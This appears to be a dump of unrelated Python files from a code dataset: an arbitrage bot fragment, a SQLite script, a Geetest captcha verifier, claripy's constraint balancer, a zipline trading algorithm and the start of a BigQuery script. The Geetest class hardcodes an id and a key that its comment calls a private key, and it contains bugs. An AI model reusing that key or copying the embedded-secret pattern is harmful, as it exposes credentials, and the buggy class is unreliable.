%s\" % hedge_btc_amount)\n return\n\n \"\"\"\n 计算的关键点在于bcc和btc的买卖amount除去手续费后是相同的,也就是进行一个循环交易后bcc和btc的总量是不变的, 变的是usd\n profit=去除交易手续费后交易hedge_bch_amount的赢利\n \"\"\"\n t_price = round(base_pair_bid_price_real - synthetic_ask_price_real, self.precision)\n profit = round(t_price * hedge_bch_amount, self.precision)\n logging.debug(\"forward======>t_price: %s, profit: %s\" % (t_price, profit))\n if profit > 0:\n logging.info(\"reverse======>find profit!!!: profit:%s, bch amount: %s and btc amount: %s, t_price: %s\" %\n (profit, hedge_bch_amount, hedge_btc_amount, t_price))\n if profit < self.profit_trigger:\n logging.warn(\"reverse======>profit should >= %s usd\" % self.profit_trigger)\n return\n\n current_time = time.time()\n if current_time - self.last_trade < 5:\n logging.warn(\"reverse======>Can't automate this trade, last trade \" +\n \"occured %.2f seconds ago\" %\n (current_time - self.last_trade))\n return\n if not self.monitor_only:\n logging.info(\"reverse======>Ready to trade\")\n amount_pair1 = hedge_bch_amount * (1 + self.fee_pair1)\n amount_pair2 = hedge_bch_amount * pair1_ask_price * (1 + self.fee_pair2) * (1 + self.fee_pair1)\n self.new_order(market=self.base_pair, order_type='sell', amount=hedge_bch_amount,\n price=base_pair_bid_price)\n self.new_order(market=self.pair_1, order_type='buy', amount=amount_pair1, price=pair1_ask_price)\n self.new_order(market=self.pair_2, order_type='buy', amount=amount_pair2, price=pair2_ask_price)\n self.skip = True\n\n self.last_trade = time.time()\n\n # def update_balance(self):\n # super(TriangleArbitrage, self).update_balance()\n # for name in self.brokers:\n # broker = self.brokers[name]\n # logging.info(\"%s btc balance: %s\" % (broker.name, broker.btc_available))\n # logging.info(\"%s bch balance: %s\" % (broker.name, 
broker.bch_available))\n","sub_path":"quant/observers/t_bfx_lq.py","file_name":"t_bfx_lq.py","file_ext":"py","file_size_in_byte":15488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"290096843","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport sqlite3\nimport traceback\nconn = sqlite3.connect('data.sqlite')\nc = conn.cursor()\ndef myZhengli(raw):\n print(dir(raw))\n fs=raw.description\n res=[]\n for one in raw:\n o1={}\n i=0\n for a in one:\n o1[fs[i][0]]=a\n i+=1\n res.append(o1)\n return res\ndef testRaw():\n cmd=\"select * from parts_contact where work_month IS NULL and tiaoshi_date between '2016-10-17' and '2016-12-17'\"\n raw=c.execute(cmd)\n r=myZhengli(raw) \n print(r)\ndef update1():\n # c.execute('alter table parts_contact add column dianqi varchar(30)') \n # c.execute('alter table parts_contact add column jixie varchar(30)') \n # c.execute('alter table parts_contact add column hongwai varchar(30)') \n # c.execute('alter table parts_contact add column redao varchar(30)') \n c.execute('alter table parts_contact add column work_month date') \n conn.commit()\n# r=testRaw()\n# update1()\n#c.execute('select * from parts_pack where name=\"ON必备英文\"')\n# # items=[]\n# for row in c:\n# s=\"\"\n# for r in row:\n# s+=str(r)+'\\t'\n# print(s)\n\n# # We can also close the cursor if we are done with it\n# c.close()\n# def remove(cmd):\n# cs=cmd.split(\"\\n\")\n# r=\"\"\n# for c in cs:\n# if c[:2]==\"--\":\n# pass\n# else:\n# r+=c+\"\\n\"\n# return r\ndef updateDb():\n cmds=codecs.open(\"tableStruct.sql\",\"r\",'gb18030').read().split(\";\")\n for cmd in cmds:\n try:\n print(cmd)\n c.execute(cmd)\n except sqlite3.OperationalError as e:\n traceback.print_exc()\n if \"already exists\" in str(e):\n pass\n else:\n input(\"pause\")\n except sqlite3.IntegrityError as e:\n pass\n conn.commit()\nupdateDb() 
","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"461788934","text":"from _md5 import md5\nimport time\n\nimport requests\nfrom pprint import pprint\nimport json\n\n\nclass Geetest:\n id = \"b1f425b289361afab1c3624e916a5b7d\" # 您的id, 在极验后台获取\n key = \"6891701a158938f1596941a000b7cfa0\" # 您的私钥, 在极验后台获取\n API_URL = \"http://api.geetest.com/gt_verify\"\n\n @staticmethod\n def verify(challenge, phone):\n seccode = md5((Geetest.key + challenge).encode()).hexdigest()\n query = {\n \"id\": id,\n \"seccode\": seccode,\n \"idType\": \"1\",\n \"idValue\": md5(phone.encode()).hexdigest(),\n \"challenge\": challenge,\n \"user_ip\": \"1.2.3.4\",\n \"timestamp\": time.time(),\n \"crash\": \"0\",\n }\n print(\"query:\", query)\n resp = requests.post(Geetest.API_URL, data=query)\n print(\"response:\", resp)\n result = resp.content\n print(\"result:\", )\n pprint(json.loads(result.decode()))\n return result.json()['success']\n","sub_path":"Base/geetests.py","file_name":"geetests.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"125943847","text":"import logging\n\nl = logging.getLogger('claripy.balancer')\n\nclass Balancer(object):\n '''\n The Balancer is an equation redistributor. 
The idea is to take an AST and\n rebalance it to, for example, isolate unknown terms on one side of an\n inequality.\n '''\n\n def __init__(self, backend):\n self._backend = backend\n\n def constraint_to_si(self, expr):\n \"\"\"\n We take in constraints, and convert them into constrained strided-intervals.\n\n For example, expr =\n ,\n 0x1[0x0, 0x100]>, )>,\n ,\n \n )>\n )>\n )>,\n 0\n )>\n The result would be\n [ ( SI_1208<64>0x1[0x0, 0x100], SI_XXXX<64>0x1[0x0, 0x27] ) ]\n\n As we can only deal with bits, we will convert all integers into BVV during the solving and conversion process.\n\n :param expr: The constraint\n :return: whether the expr is satisfiable (boolean), and a list of tuples in form of\n (original_si, constrained_si).\n \"\"\"\n\n try:\n sat, lst = self._handle(expr.op, expr.args)\n return sat, lst\n\n except ClaripyBalancerError as ex:\n l.error('VSASimplifiers raised an exception %s. Please report it.', str(ex), exc_info=True)\n\n # return the dummy result\n return True, [ ]\n\n def _simplify(self, op, args, expr, condition):\n handler_name = \"_simplify_%s\" % op\n if not hasattr(self, handler_name):\n l.error('Simplification handler \"%s\" is not found in balancer. 
Consider implementing.', handler_name)\n return expr, condition\n\n new_expr, new_cond = getattr(self, \"_simplify_%s\" % op)(args, expr, condition)\n return new_expr, new_cond\n\n def _handle(self, op, args):\n\n if len(args) == 2:\n lhs, rhs = args\n\n # Simplify left side\n lhs, new_cond = self._simplify(lhs.op, lhs.args, lhs, (op, rhs))\n\n # Update args\n op, rhs = new_cond\n args = (lhs, rhs)\n\n sat, lst = getattr(self, \"_handle_%s\" % op)(args)\n\n else:\n sat, lst = getattr(self, \"_handle_%s\" % op)(args)\n\n return sat, lst\n\n #\n # Dealing with constraints\n #\n\n reversed_operations = { }\n reversed_operations['__ne__'] = '__eq__'\n reversed_operations['__eq__'] = '__ne__'\n reversed_operations['ULT'] = 'UGE'\n reversed_operations['UGT'] = 'ULE'\n reversed_operations['ULE'] = 'UGT'\n reversed_operations['UGE'] = 'ULT'\n reversed_operations['SLT'] = 'SGE'\n reversed_operations['SLE'] = 'SGT'\n reversed_operations['SGT'] = 'SLE'\n reversed_operations['SGE'] = 'SLT'\n reversed_operations['__le__'] = '__gt__'\n reversed_operations['__lt__'] = '__ge__'\n reversed_operations['__ge__'] = '__lt__'\n reversed_operations['__gt__'] = '__le__'\n\n comparison_info = { }\n # Tuples look like (is_lt, is_eq, is_unsigned)\n comparison_info['SLT'] = (True, False, False)\n comparison_info['SLE'] = (True, True, False)\n comparison_info['SGT'] = (False, False, False)\n comparison_info['SGE'] = (False, True, False)\n comparison_info['ULT'] = (True, False, True)\n comparison_info['ULE'] = (True, True, True)\n comparison_info['UGT'] = (False, False, True)\n comparison_info['UGE'] = (False, True, True)\n comparison_info['__lt__'] = comparison_info['ULT']\n comparison_info['__le__'] = comparison_info['ULE']\n comparison_info['__gt__'] = comparison_info['UGT']\n comparison_info['__ge__'] = comparison_info['UGE']\n\n def _simplify_ZeroExt(self, args, expr, condition):\n \"\"\"\n :param args:\n :param expr:\n :return: (new ast, new condition)\n \"\"\"\n cond_op, cond_arg = 
condition\n # Normalize cond_arg\n if type(cond_arg) in (int, long): #pylint:disable=unidiomatic-typecheck\n cond_arg = _all_operations.BVV(cond_arg, expr.size())\n\n extended_bits, arg = args\n\n if cond_arg.size() <= arg.size() or \\\n is_true(cond_arg[ expr.size() - 1 : expr.size() - extended_bits ] == 0):\n # We can safely eliminate this layer of ZeroExt\n if cond_arg.size() < arg.size():\n larger_cond_arg = cond_arg.zero_extend(arg.size() - cond_arg.size())\n if not isinstance(self._backend.convert(larger_cond_arg), Base):\n return self._simplify(arg.op, arg.args, arg, (cond_op, larger_cond_arg))\n else:\n return self._simplify(arg.op, arg.args, arg, (cond_op, cond_arg[ arg.size() - 1 : 0 ]))\n\n else:\n # TODO: We may also handle the '__eq__' and '__ne__' case\n # We cannot handle this...\n return expr, condition\n\n def _simplify_BVS(self, args, expr, condition): #pylint:disable=no-self-use,unused-argument\n return expr, condition\n\n def _simplify_SignExt(self, args, expr, condition):\n \"\"\"\n\n :param args:\n :param expr:\n :param condition:\n :return:\n \"\"\"\n # TODO: Review the logic of this method\n cond_op, cond_arg = condition\n # Normalize them\n if type(cond_arg) in (int, long): #pylint:disable=unidiomatic-typecheck\n cond_arg = _all_operations.BVV(cond_arg, expr.size())\n\n extended_bits, arg = args\n\n if cond_arg.size() <= arg.size() or \\\n is_true(cond_arg[expr.size() - 1: expr.size() - extended_bits] == 0):\n # We can safely eliminate this layer of SignExt\n if cond_arg.size() < arg.size():\n larger_cond_arg = cond_arg.zero_extend(arg.size() - cond_arg.size()).resolved()\n if not isinstance(larger_cond_arg, Base):\n return self._simplify(arg.op, arg.args, arg, (cond_op, larger_cond_arg))\n else:\n return self._simplify(arg.op, arg.args, arg, (cond_op, cond_arg[arg.size() - 1: 0]))\n\n else:\n # TODO: We may also handle the '__eq__' and '__ne__' case\n # We cannot handle this...\n return expr, condition\n\n def _simplify_Extract(self, args, 
expr, condition):\n '''\n Convert Extract(a, b, If(...)) to If(..., Extract(a, b, ...), Extract(a, b, ...))\n\n :param args:\n :return:\n '''\n\n high, low, to_extract = args\n cond_operation, cond_operand = condition\n # Make sure the condition operand has the same size as to_extract\n new_condition = cond_operation, _all_operations.ZeroExt((high - low + 1), cond_operand)\n ast, cond = self._simplify(to_extract.op, to_extract.args, to_extract, new_condition)\n\n # Create the new ifproxy\n if ast is None:\n # We cannot handle it\n return None, condition\n\n elif ast.op == 'If':\n new_ifproxy = _all_operations.If(\n ast.args[0],\n _all_operations.Extract(high, low, ast.args[1]),\n _all_operations.Extract(high, low, ast.args[2])\n )\n\n else:\n cond_op, cond_arg = cond\n if type(self._backend.convert(cond_arg)) in (int, long): #pylint:disable=unidiomatic-typecheck\n cond_arg = _all_operations.BVV(cond_arg, ast.size())\n elif type(self._backend.convert(cond_arg)) in (vsa.StridedInterval, vsa.DiscreteStridedIntervalSet, bv.BVV): #pylint:disable=unidiomatic-typecheck\n if ast.size() > cond_arg.size():\n # Make sure two operands have the same size\n cond_arg = _all_operations.ZeroExt(ast.size() - cond_arg.size(), cond_arg)\n\n if cond_arg.size() - 1 < high + 1 or \\\n is_true(cond_arg[cond_arg.size() - 1 : high + 1] == 0):\n # The upper part doesn't matter\n # We can handle it\n return self._simplify(ast.op, ast.args, ast, (cond_op, cond_arg))\n else:\n # We cannot further simplify it\n return expr, condition\n\n return new_ifproxy, condition\n\n def _simplify_Concat(self, args, expr, condition):\n '''\n Convert Concat(a, If(...)) to If(..., Concat(a, ...), Concat(a, ...))\n\n :param args:\n :return:\n '''\n\n new_args = [ self._simplify(ex.op, ex.args, ex, condition) for ex in args ]\n\n ifproxy_conds = set([ a.args[0] for a, new_cond in new_args if a.op == 'If' ])\n\n if len(ifproxy_conds) == 0:\n # Let's check if we can remove this layer of Concat\n cond = 
condition[1]\n if len(args) == 2:\n if cond.size() - 1 >= cond.size() - args[0].size():\n if is_true(args[0] == cond[ cond.size() - 1 : cond.size() - args[0].size() ]):\n # Yes! We can remove it!\n # TODO: This is hackish...\n new_cond = (condition[0], cond[ cond.size() - args[0].size() - 1 : 0])\n return self._simplify(args[1].op, args[1].args, args[1], new_cond)\n\n else:\n # args[0].size() == 0? It must be a bug.\n raise ClaripyBackendVSAError(\n 'args[0].size() == %d (args[0] is \\'%s\\'). Please report this bug.' % (args[0].size, str(args[0])))\n\n # Cannot simplify it anymore\n return expr, condition\n\n elif len(ifproxy_conds) > 1:\n # We have more than one condition. Cannot handle it for now!\n return None, condition\n\n else:\n concat_trueexpr = [ ]\n concat_falseexpr = [ ]\n\n all_new_conds = set([ new_cond for a, new_cond in new_args ])\n\n if len(all_new_conds) > 1:\n # New conditions are not consistent. Can't handle it.\n return expr, condition\n\n for a, new_cond in new_args:\n if a.op == \"If\":\n concat_trueexpr.append(a.args[1])\n concat_falseexpr.append(a.args[2])\n else:\n concat_trueexpr.append(a)\n concat_falseexpr.append(a)\n\n new_ifproxy = _all_operations.If(\n list(ifproxy_conds)[0],\n _all_operations.Concat(*concat_trueexpr),\n _all_operations.Concat(*concat_falseexpr)\n )\n\n return new_ifproxy, condition\n\n def _simplify_I(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n return expr, condition\n\n def _simplify_If(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n return expr, condition\n\n def _simplify_Reverse(self, args, expr, condition): #pylint:disable=unused-argument\n # TODO: How should we deal with Reverse in a smart way?\n\n arg = args[0]\n\n return self._simplify(arg.op, arg.args, arg, condition)\n\n def _simplify_widen(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify_intersection(self, args, expr, 
condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___or__(self, args, expr, condition):\n claripy = expr._claripy\n argl, argr = args\n if argl is argr or claripy.is_true(argl == argr):\n return self._simplify(argl.op, argl.args, argl, condition)\n elif claripy.is_true(argl == 0):\n return self._simplify(argr.op, argr.args, argr, condition)\n elif claripy.is_true(argr == 0):\n return self._simplify(argl.op, argl.args, argl, condition)\n else:\n return expr, condition\n\n def _simplify___and__(self, args, expr, condition):\n\n argl, argr = args\n if argl is argr:\n # Operands are the same one!\n # We can safely remove this layer of __and__\n return self._simplify(argl.op, argl.args, argl, condition)\n\n elif argl.structurally_match(argr):\n # Operands are the same\n # Safely remove the __and__ operation\n return self._simplify(argl.op, argl.args, argl, condition)\n\n else:\n # We cannot handle it\n return expr, condition\n\n def _simplify___xor__(self, args, expr, condition):\n argl, argr = args\n\n if is_true(argl == 0):\n # :-)\n return self._simplify(argr.op, argr.args, argr, condition)\n elif is_true(argr == 0):\n # :-)\n return self._simplify(argl.op, argl.args, argl, condition)\n else:\n # :-(\n return expr, condition\n\n def _simplify___add__(self, args, expr, condition):\n\n argl, argr = args\n if is_true(argr == 0):\n # This layer of __add__ can be removed\n return self._simplify(argl.op, argl.args, argl, condition)\n elif is_true(argl == 0):\n # This layer of __add__ can be removed\n return self._simplify(argr.op, argr.args, argr, condition)\n else:\n\n if isinstance(self._backend.convert(argl), bv.BVV):\n new_cond = (condition[0], condition[1] - argl)\n return self._simplify(argr.op, argr.args, argr, new_cond)\n\n elif isinstance(self._backend.convert(argr), bv.BVV):\n new_cond = (condition[0], condition[1] - argr)\n return self._simplify(argl.op, argl.args, argl, new_cond)\n\n else:\n return expr, 
condition\n\n def _simplify___radd__(self, args, expr, condition):\n return self._simplify___add__((args[1], args[0]), expr, condition)\n\n def _simplify___sub__(self, args, expr, condition):\n \"\"\"\n\n :param args:\n :param expr:\n :param condition:\n :return:\n \"\"\"\n\n argl, argr = args\n if is_true(argr == 0):\n return self._simplify(argl.op, argl.args, argl, condition)\n elif is_true(argl == 0):\n return self._simplify(argr.op, argr.args, argr, condition)\n else:\n return expr, condition\n\n def _simplify___rsub__(self, args, expr, condition):\n return self._simplify___sub__((args[1], args[0]), expr, condition)\n\n def _simplify___rshift__(self, args, expr, condition):\n\n arg, offset = args\n if is_true(offset == 0):\n return self._simplify(arg.op, arg.args, arg, condition)\n else:\n return expr, condition\n\n def _simplify___lshift__(self, args, expr, condition):\n\n arg, offset = args\n if is_true(offset == 0):\n return self._simplify(arg.op, arg.args, arg, condition)\n else:\n return expr, condition\n\n def _simplify___invert__(self, args, expr, condition):\n\n arg = args[0]\n if arg.op == 'If':\n new_arg = _all_operations.If(args[0], args[1].__invert__(), args[2].__invert__())\n\n return self._simplify(new_arg.op, new_arg.args, expr, condition)\n\n else:\n return expr, condition\n\n def _simplify_union(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___mod__(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___div__(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___eq__(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n l.error('_simplify___eq__() should not exist. This is just a workaround for VSA. 
Fish will fix the issue later.')\n\n return expr, condition\n\n def _handle_comparison(self, args, comp=None):\n \"\"\"\n Handles all comparisons.\n :param args:\n :param comp:\n :return:\n \"\"\"\n\n if comp in self.comparison_info:\n is_lt, is_equal, is_unsigned = self.comparison_info[comp]\n else:\n raise ClaripyBalancerError('Support for comparison %s is not implemented. Please report it.' % comp)\n\n lhs, rhs = args\n\n if not isinstance(lhs, Base):\n raise ClaripyBalancerError('Left-hand-side expression is not an AST object.')\n\n lhs_bo = self._backend.convert(lhs)\n rhs_bo = self._backend.convert(rhs)\n\n # Maybe the target variable is the rhs\n if lhs.cardinality == 1 or lhs_bo.is_empty:\n new_op = self.reversed_operations[comp]\n new_lhs, new_rhs = rhs, lhs\n return self._handle(new_op, (new_lhs, new_rhs))\n\n if lhs.op == 'If':\n condition, trueexpr, falseexpr = lhs.args\n trueexpr = self._backend.convert(trueexpr)\n falseexpr = self._backend.convert(falseexpr)\n\n if is_unsigned:\n if is_lt:\n if is_equal:\n take_true = is_true(trueexpr.ULE(rhs_bo))\n take_false = is_true(falseexpr.ULE(rhs_bo))\n else:\n take_true = is_true(falseexpr.ULT(rhs_bo))\n take_false = is_true(trueexpr.ULT(rhs_bo))\n else:\n if is_equal:\n take_true = is_true(trueexpr.UGE(rhs_bo))\n take_false = is_true(falseexpr.UGE(rhs_bo))\n else:\n take_true = is_true(trueexpr.UGT(rhs_bo))\n take_false = is_true(falseexpr.UGT(rhs_bo))\n else:\n if is_lt:\n if is_equal:\n take_true = is_true(trueexpr <= rhs_bo)\n take_false = is_true(falseexpr <= rhs_bo)\n else:\n take_true = is_true(trueexpr < rhs_bo)\n take_false = is_true(falseexpr < rhs_bo)\n else:\n if is_equal:\n take_true = is_true(trueexpr >= rhs_bo)\n take_false = is_true(falseexpr >= rhs_bo)\n else:\n take_true = is_true(trueexpr > rhs_bo)\n take_false = is_true(falseexpr > rhs_bo)\n\n if take_true and take_false:\n # It's always satisfiable\n return True, [ ]\n elif take_true:\n return self._handle(condition.op, condition.args)\n 
elif take_false:\n rev_op = self.reversed_operations[condition.op]\n return self._handle(rev_op, condition.args)\n else:\n # Not satisfiable\n return False, [ ]\n\n elif isinstance(rhs_bo, vsa.StridedInterval) and isinstance(lhs_bo, vsa.StridedInterval):\n if isinstance(lhs_bo, Base):\n # It cannot be computed by our backend...\n # We just give up for now\n return True, [ ]\n\n stride = lhs_bo.stride\n\n if is_lt:\n # < or <=\n if is_unsigned: lb = 0\n else: lb = vsa.StridedInterval.min_int(rhs.length)\n\n ub = rhs_bo.upper_bound\n if not is_equal:\n # <\n ub = ub - 1\n\n else:\n # > or >=\n if is_unsigned: ub = vsa.StridedInterval.max_int(rhs.length)\n else: ub = vsa.StridedInterval.max_int(rhs.length - 1)\n\n lb = rhs_bo.lower_bound\n if not is_equal:\n # >\n lb = lb + 1\n\n if stride == 0 and lb != ub:\n # Make sure the final vsa.StridedInterval is always meaningful. See issue #55.\n stride = 1\n\n si_replacement = _all_operations.SI(bits=rhs.length, stride=stride, lower_bound=lb, upper_bound=ub)\n return True, [(lhs, si_replacement)]\n\n else:\n return True, [ ]\n\n def _handle___lt__(self, args): return self._handle_comparison(args, comp='__lt__')\n def _handle___le__(self, args): return self._handle_comparison(args, comp='__le__')\n def _handle___gt__(self, args): return self._handle_comparison(args, comp='__gt__')\n def _handle___ge__(self, args): return self._handle_comparison(args, comp='__ge__')\n def _handle_ULT(self, args): return self._handle_comparison(args, comp='ULT')\n def _handle_ULE(self, args): return self._handle_comparison(args, comp='ULE')\n def _handle_UGT(self, args): return self._handle_comparison(args, comp='UGT')\n def _handle_UGE(self, args): return self._handle_comparison(args, comp='UGE')\n def _handle_SLT(self, args): return self._handle_comparison(args, comp='SLT')\n def _handle_SLE(self, args): return self._handle_comparison(args, comp='SLE')\n def _handle_SGT(self, args): return self._handle_comparison(args, comp='SGT')\n def 
_handle_SGE(self, args): return self._handle_comparison(args, comp='SGE')\n\n def _handle_I(self, args): #pylint:disable=no-self-use\n a = args[0]\n\n if a in (False, 0):\n return False, [ ]\n elif isinstance(a, bv.BVV) and a.value == 0:\n return False, [ ]\n\n return True, [ ]\n\n def _handle_Not(self, args):\n \"\"\"\n The argument should be False\n\n :param args:\n :return:\n \"\"\"\n\n a = args[0]\n expr_op = a.op\n expr_args = a.args\n\n # Reverse the op\n expr_op = self.reversed_operations[expr_op]\n\n return self._handle(expr_op, expr_args)\n\n def _handle_And(self, args):\n \"\"\"\n\n :param args:\n :return:\n \"\"\"\n\n sat = True\n lst = [ ]\n\n # Both sides must be true\n for arg in args:\n sat_, lst_ = self._handle(arg.op, arg.args)\n\n sat &= sat_\n lst.extend(lst_)\n\n if not sat:\n lst = [ ]\n\n return sat, lst\n\n def _handle_Or(self, args):\n\n if len(args) == 1:\n return self._handle(args[0].op, args[0].args)\n\n else:\n if len(args) > 0:\n args = [ self._handle(a.op, a.args) for a in args ]\n if any([not is_false(a) for a in args]):\n return True, [ ]\n\n else:\n return False, [ ]\n return True, [ ]\n\n def _handle___ne__(self, args):\n return self._handle_eq_ne(args, False)\n\n def _handle___eq__(self, args):\n return self._handle_eq_ne(args, True)\n\n def _handle_eq_ne(self, args, is_eq):\n \"\"\"\n\n :param args:\n :return: True or False, and a list of (original_si, constrained_si) tuples\n \"\"\"\n\n lhs, rhs = args\n\n if not isinstance(lhs, Base):\n raise ClaripyBalancerError('Left-hand-side expression is not an AST object.')\n\n size = lhs.size()\n\n if type(rhs) in (int, long): #pylint:disable=unidiomatic-typecheck\n # Convert it into a BVV\n rhs = _all_operations.BVV(rhs, size)\n\n if not isinstance(rhs, Base):\n raise ClaripyBalancerError('Right-hand-side expression cannot be converted to an AST object.')\n\n # TODO: Make sure the rhs doesn't contain any IfProxy\n\n if lhs.op == 'If':\n condition, trueexpr, falseexpr = lhs.args\n\n if 
is_eq:\n # __eq__\n take_true = is_true(rhs == trueexpr)\n take_false = is_true(rhs == falseexpr)\n else:\n # __ne__\n take_true = is_true(rhs == falseexpr)\n take_false = is_true(rhs == trueexpr)\n\n if take_true and take_false:\n # It's always satisfiable\n return True, [ ]\n\n elif take_true:\n # We take the true side\n return self._handle(condition.op, condition.args)\n\n elif take_false:\n # We take the false side\n\n # Reverse the operation first\n rev_op = self.reversed_operations[condition.op]\n\n return self._handle(rev_op, condition.args)\n\n else:\n # Not satisfiable\n return False, [ ]\n elif isinstance(self._backend.convert(lhs), vsa.StridedInterval) or isinstance(self._backend.convert(lhs), bv.BVV):\n if not isinstance(self._backend.convert(lhs), vsa.StridedInterval):\n try: lhs = _all_operations.SI(to_conv=lhs)\n except BackendError: return True, [ ] # We cannot convert it to a vsa.StridedInterval\n\n try: rhs = self._backend.convert(rhs)\n except BackendError: return True, [ ]\n\n if is_eq:\n return True, [ (lhs, rhs)]\n else:\n lhs_bo = self._backend.convert(lhs)\n rhs_bo = self._backend.convert(rhs)\n\n if lhs_bo.upper_bound <= rhs_bo.upper_bound:\n r = self._backend.CreateStridedInterval(bits=rhs_bo.bits,\n stride=lhs_bo.stride,\n lower_bound=lhs_bo.lower_bound,\n upper_bound=rhs_bo.lower_bound - 1)\n\n return True, [ (lhs, r) ]\n elif lhs_bo.lower_bound >= rhs_bo.lower_bound:\n r = self._backend.CreateStridedInterval(bits=rhs_bo.bits,\n stride=lhs_bo.stride,\n lower_bound=rhs_bo.lower_bound + 1,\n upper_bound=lhs_bo.upper_bound)\n\n return True, [ (lhs, r) ]\n else:\n # We cannot handle it precisely\n return True, [ ]\n else:\n # TODO: handle this\n return True, [ ]\n\ndef is_true(a): return backends.vsa.is_true(a)\ndef is_false(a): return backends.vsa.is_false(a)\n\nfrom .errors import ClaripyBalancerError, ClaripyBackendVSAError, BackendError\nfrom .ast.base import Base\nfrom . 
import _all_operations\nfrom .backend_manager import backends\nfrom . import vsa\nfrom . import bv\n","sub_path":"claripy/balancer.py","file_name":"balancer.py","file_ext":"py","file_size_in_byte":26704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"505924937","text":"import sys\nsys.path.append('C:/Users/William/Documents/GitHub/faber-trading-strategy/algos')\nfrom numpy import mean\nfrom collections import defaultdict\nfrom zipline.api import order_target, record, symbol, date_rules, time_rules, schedule_function\nfrom write_to_sql import run\nimport pandas as pd\nimport os\n\nfrom zipline.finance import commission\n\ndef initialize(context):\n \"\"\"\n Stores the names of the stocks we'll be looking at.\n \n Input: a persistent namespace where we store an SID/list of SIDs\n \n Output: n/a\n \"\"\"\n context.benchmark = symbol('SPY')\n\n # context.symbol = [symbol('AAPL')]\n\n context.symbol = [symbol('XLB'),\n symbol('XLE'),\n symbol('XLF'), \n symbol('XLK'), \n symbol('XLP'), \n symbol('XLY')]\n\n # keep track of number of shares bought\n # context.shares = defaultdict(int)\n context.long_sma = defaultdict(int)\n context.short_sma = defaultdict(int)\n\n context.set_commission(commission.PerShare(cost=0))\n\n # initializes certain params in handle_data that must be run only on the first event\n context.skip = 0\n\n context.ratio = 0\n schedule_function(skip_days, date_rules.every_day(), time_rules.market_open(minutes=1))\n schedule_function(trade, date_rules.every_day(), time_rules.market_open(minutes=3))\n\ndef skip_days(context, data):\n context.skip += 1\n\ndef trade(context, data):\n \"\"\"\n Herein lies Faber's trading strategy.\n \n Input: persistent namespace with SID(s) 'context', event-frame that handles look-ups of historical/current pricing data\n \n Output: some kind of action (buy/sell/nothing) on the last trading day of each month\n \"\"\"\n if context.skip < 200:\n pass\n\n else:\n for 
asset in context.symbol:\n # calculate 200-day and 20-day sma\n context.long_sma[asset] = mean(data.history(asset, 'close', 200,'1d'))\n context.short_sma[asset] = mean(data.history(asset, 'close', 50, '1d'))\n \n ### Trading strategy ###\n\n for asset in context.symbol:\n # if the short_sma > long_sma, buy\n if context.short_sma[asset] >= context.long_sma[asset]:\n order_target(asset, 100)\n # context.shares[asset] = 100\n\n # else if the current price is below moving average, short\n elif context.short_sma[asset] < context.long_sma[asset]:\n order_target(asset, 0)\n # context.shares[asset] = 0\n\n # save/record the data for future plotting\n # record(asset = context.monthly_price[asset][-1], sma = context.moving_avg[asset])\n\n # record portfolio value\n # record(portfolio = context.portfolio.portfolio_value)\n\n # # also record the S&P 500 monthly price\n # record(SPY = context.ratio * data.current(context.benchmark, 'close'))\n \n\ndef handle_data(context, data):\n pass\n\ndef analyze(context = None, results = None):\n \"\"\"\n Plots the results of the strategy against a buy-and-hold strategy.\n \n Input: n/a?\n \n Output: a plot of two superimposed curves, one being Faber's strategy and the other being a buy-and-hold strategy.\n \"\"\"\n # import matplotlib.pyplot as plt\n\n # txn = results['transactions']\n # txn.to_csv('transactions.csv')\n\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n\n # # plot both the portfolio based on faber's strategy and a buy-and-hold strategy\n # results['portfolio'].plot(ax=ax1)\n # # results['SPY'].plot(ax=ax1)\n # ax1.set_ylabel('Portfolio value (USD)')\n \n # # export portfolio values to csv file\n # results['returns'].to_csv('zipline_returns.csv')\n\n # plt.show()\n\n\n import pyfolio as pf\n\n returns, positions, transactions = pf.utils.extract_rets_pos_txn_from_zipline(results)\n pf.create_simple_tear_sheet(returns, positions=positions, transactions=transactions) \n transactions.to_csv('transactions.csv')\n # 
tickers = []\n # for symbol in context.symbol:\n # symbol = str(symbol).translate(None, '0123456789[]() ')[6:]\n # tickers.append(symbol)\n\n # run('test.db', results, 'faber', tickers)\n","sub_path":"trading algos/dual_moving_avg.py","file_name":"dual_moving_avg.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"297037662","text":"#!/usr/bin/env python\n\n# Copyright 2015, Google, Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nDate: 2016-11-09\nAuthor: Nabeel Saad\nDesc: Command-line application, which asynchronously executes jobs via bash/CLI (for BQ and others like Hive).\nUse: Commands to run are expected in a separate file, each command on a new line, semi-colon delimited with format:\n category; number of times to run; command\nParams: GCP / BigQuery project ID, file containing commands to run\n\"\"\"\n\nimport argparse\nimport csv\nimport datetime\nimport json\nimport os\nimport time\nimport uuid\nimport subprocess\nimport sys\n#TODO remove, when getting rid of test, get rid of this import\nimport random\nimport logging\n\nfrom googleapiclient import discovery\nfrom oauth2client.client import 